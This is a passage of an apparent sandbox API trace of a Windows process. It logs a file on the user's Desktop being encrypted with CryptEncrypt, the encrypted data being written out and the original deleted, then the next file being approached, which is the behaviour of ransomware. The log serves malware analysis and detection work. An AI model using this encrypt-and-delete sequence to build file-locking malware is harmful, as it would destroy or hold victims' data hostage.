dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0123.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0123.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0123.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797008 [0123.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0123.890] CryptGetKeyParam (in: hKey=0x41ac100, dwParam=0x7, pbData=0x43e2850, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2850*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea6b8 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0123.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0123.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0123.891] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.891] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.891] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.891] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.892] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.892] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x18980, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x18990) returned 1 [0123.893] CharLowerBuffW (in: lpsz="byte[100753]", cchLength=0xc | out: lpsz="byte[100753]") returned 0xc [0123.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0123.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0123.895] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49089d0*, pdwDataLen=0x144e790*=0x18980, dwBufLen=0x18990 | out: pbData=0x49089d0*, pdwDataLen=0x144e790*=0x18990) returned 1 [0123.950] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.950] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.955] WriteFile (in: hFile=0x258, lpBuffer=0x49c29a8*, nNumberOfBytesToWrite=0x18990, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49c29a8*, lpNumberOfBytesWritten=0x144f194*=0x18990, lpOverlapped=0x0) returned 1 [0123.957] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0123.957] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca9b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0123.957] CryptDestroyKey (hKey=0x41ac100) returned 1 [0123.957] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.957] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.958] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0123.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0123.958] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.958] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.958] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0123.958] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0123.958] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.958] FreeLibrary (hLibModule=0x756e0000) returned 1 [0123.958] CloseHandle (hObject=0x2a0) returned 1 [0123.958] CloseHandle (hObject=0x258) returned 1 [0123.961] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3", lpFilePart=0x0) returned 0x22 [0123.961] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\kltew7.mp3")) returned 0x20 [0123.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0123.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0123.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0123.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0123.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43924c8 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0123.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.962] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41629130, ftCreationTime.dwHighDateTime=0x1d5ebbe, ftLastAccessTime.dwLowDateTime=0xcb05e920, ftLastAccessTime.dwHighDateTime=0x1d5eb9e, ftLastWriteTime.dwLowDateTime=0xcb05e920, ftLastWriteTime.dwHighDateTime=0x1d5eb9e, nFileSizeHigh=0x0, nFileSizeLow=0x18980, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kLTeW7.mp3", cAlternateFileName="")) returned 0x41ac040 [0123.962] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\kltew7.mp3")) returned 1 [0123.981] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41629130, ftCreationTime.dwHighDateTime=0x1d5ebbe, ftLastAccessTime.dwLowDateTime=0xcb05e920, ftLastAccessTime.dwHighDateTime=0x1d5eb9e, ftLastWriteTime.dwLowDateTime=0xcb05e920, ftLastWriteTime.dwHighDateTime=0x1d5eb9e, nFileSizeHigh=0x0, nFileSizeLow=0x18980, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="kLTeW7.mp3", cAlternateFileName="")) returned 0 [0123.981] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0123.982] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0123.982] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0123.982] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0123.983] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0123.983] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0123.983] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0123.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0123.983] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0123.984] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.984] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0124.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0124.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0124.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.030] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0124.030] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.030] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0124.030] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\LdhR.mkv", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdf40600, 